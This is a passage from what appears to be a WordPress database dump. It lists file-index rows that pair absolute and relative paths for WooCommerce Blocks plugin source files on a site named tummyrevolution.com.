e.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/related-products/save.tsx'),(8217,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/attributes.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/attributes.ts'),(8218,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/block.tsx'),(8219,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/constants.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/constants.tsx'),(8220,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/edit.tsx'),(8221,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/index.ts'),(8222,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/style.scss'),(8223,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/support.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/support.ts'),(8224,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sale-badge/types.ts'),(8225,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/save.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/save.js'),(8226,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/config.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/config.tsx'),(8227,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/editor.scss'),(8228,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/product-selector.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/product-selector.tsx'),(8229,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/use-is-descendent-of-single-product-block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/use-is-descendent-of-single-product-block.tsx'),(8230,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/use-is-descendent-of-single-product-template.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/use-is-descendent-of-single-product-template.tsx'),(8231,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/with-product-selector.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/shared/with-product-selector.js'),(8232,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/attributes.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/attributes.ts'),(8233,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/block.tsx'),(8234,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/constants.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/constants.tsx'),(8235,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/edit.tsx'),(8236,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/index.tsx'),(8237,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/style.scss'),(8238,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/supports.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/supports.ts'),(8239,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/sku/types.ts'),(8240,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/attributes.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/attributes.ts'),(8241,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/block.tsx'),(8242,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/constants.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/constants.tsx'),(8243,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/edit.tsx'),(8244,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/index.ts'),(8245,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/style.scss'),(8246,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/supports.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/supports.ts'),(8247,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/stock-indicator/types.ts'),(8248,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/attributes.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/attributes.ts'),(8249,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/block.tsx'),(8250,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/constants.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/constants.tsx'),(8251,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/edit.tsx'),(8252,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/editor.scss'),(8253,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/index.ts'),(8254,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/save.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/save.tsx'),(8255,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/style.scss'),(8256,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/supports.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/supports.ts'),(8257,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/summary/types.ts'),(8258,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/attributes.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/attributes.ts'),(8259,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/block.tsx'),(8260,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/constants.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/constants.tsx'),(8261,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/edit.tsx'),(8262,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/editor.scss'),(8263,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/frontend.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/frontend.ts'),(8264,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/index.ts'),(8265,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/save.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/save.tsx'),(8266,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/style.scss'),(8267,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/test/block.test.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/test/block.test.js'),(8268,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/title/types.ts'),(8269,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/utils/create-blocks-from-template.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/utils/create-blocks-from-template.js'),(8270,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/utils/get-block-map.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/utils/get-block-map.ts'),(8271,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/utils/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/utils/index.js'),(8272,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/utils/register-block-single-product-template.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/utils/register-block-single-product-template.ts'),(8273,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/utils/render-parent-block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/utils/render-parent-block.tsx'),(8274,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/utils/render-standalone-blocks.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/utils/render-standalone-blocks.js'),(8275,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/README.MD','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/README.MD'),(8276,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/block-error-boundary/block-error.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/block-error-boundary/block-error.tsx'),(8277,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/block-error-boundary/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/block-error-boundary/index.tsx'),(8278,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/block-error-boundary/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/block-error-boundary/style.scss'),(8279,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/block-error-boundary/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/block-error-boundary/types.ts'),(8280,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/button/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/button/index.tsx'),(8281,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/button/stories/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/button/stories/index.tsx'),(8282,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/button/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/button/style.scss'),(8283,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/address-form/address-form.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/address-form/address-form.tsx'),(8284,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/address-form/custom-validation-handler.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/address-form/custom-validation-handler.ts'),(8285,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/address-form/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/address-form/index.ts'),(8286,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/address-form/prepare-address-fields.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/address-form/prepare-address-fields.ts'),(8287,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/address-form/test/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/address-form/test/index.js'),(8288,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/address-form/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/address-form/types.ts'),(8289,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/address-form/validate-shipping-country.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/address-form/validate-shipping-country.ts'),(8290,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/cart-line-items-table/cart-line-item-row.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/cart-line-items-table/cart-line-item-row.tsx'),(8291,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/cart-line-items-table/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/cart-line-items-table/index.tsx'),(8292,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/cart-line-items-table/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/cart-line-items-table/style.scss'),(8293,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/form-step/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/form-step/index.tsx'),(8294,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/form-step/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/form-step/style.scss'),(8295,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/form-step/test/__snapshots__/index.js.snap','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/form-step/test/__snapshots__/index.js.snap'),(8296,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/form-step/test/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/form-step/test/index.js'),(8297,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/index.js'),(8298,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/local-pickup-select/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/local-pickup-select/index.tsx'),(8299,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/local-pickup-select/test/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/local-pickup-select/test/index.tsx'),(8300,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/order-summary/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/order-summary/index.tsx'),(8301,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/order-summary/order-summary-item.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/order-summary/order-summary-item.tsx'),(8302,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/order-summary/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/order-summary/style.scss'),(8303,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/order-summary/test/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/order-summary/test/index.js'),(8304,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/payment-method-icons/common-icons.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/payment-method-icons/common-icons.ts'),(8305,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/payment-method-icons/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/payment-method-icons/index.tsx'),(8306,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/payment-method-icons/payment-method-icon.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/payment-method-icons/payment-method-icon.tsx'),(8307,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/payment-method-icons/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/payment-method-icons/style.scss'),(8308,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/payment-method-icons/utils.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/payment-method-icons/utils.ts'),(8309,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/payment-method-label/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/payment-method-label/index.tsx'),(8310,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/payment-method-label/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/payment-method-label/style.scss'),(8311,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/pickup-location/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/pickup-location/index.tsx'),(8312,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/pickup-location/test/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/pickup-location/test/index.tsx'),(8313,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/place-order-button/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/place-order-button/index.tsx'),(8314,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/policies/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/policies/index.tsx'),(8315,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/policies/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/policies/style.scss'),(8316,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/product-backorder-badge/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/product-backorder-badge/index.tsx'),(8317,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/product-badge/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/product-badge/index.tsx'),(8318,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/product-badge/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/product-badge/style.scss'),(8319,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/product-details/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/product-details/index.tsx'),(8320,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/product-details/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/product-details/style.scss'),(8321,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/product-details/test/__snapshots__/index.js.snap','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/product-details/test/__snapshots__/index.js.snap'),(8322,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/product-details/test/index.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/product-details/test/index.js'),(8323,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/product-image/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/product-image/index.tsx'),(8324,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/product-low-stock-badge/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/product-low-stock-badge/index.tsx'),(8325,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/product-metadata/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/product-metadata/index.tsx'),(8326,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/base/components/cart-checkout/product-metadata/style.scss','wp-content/plugins/wo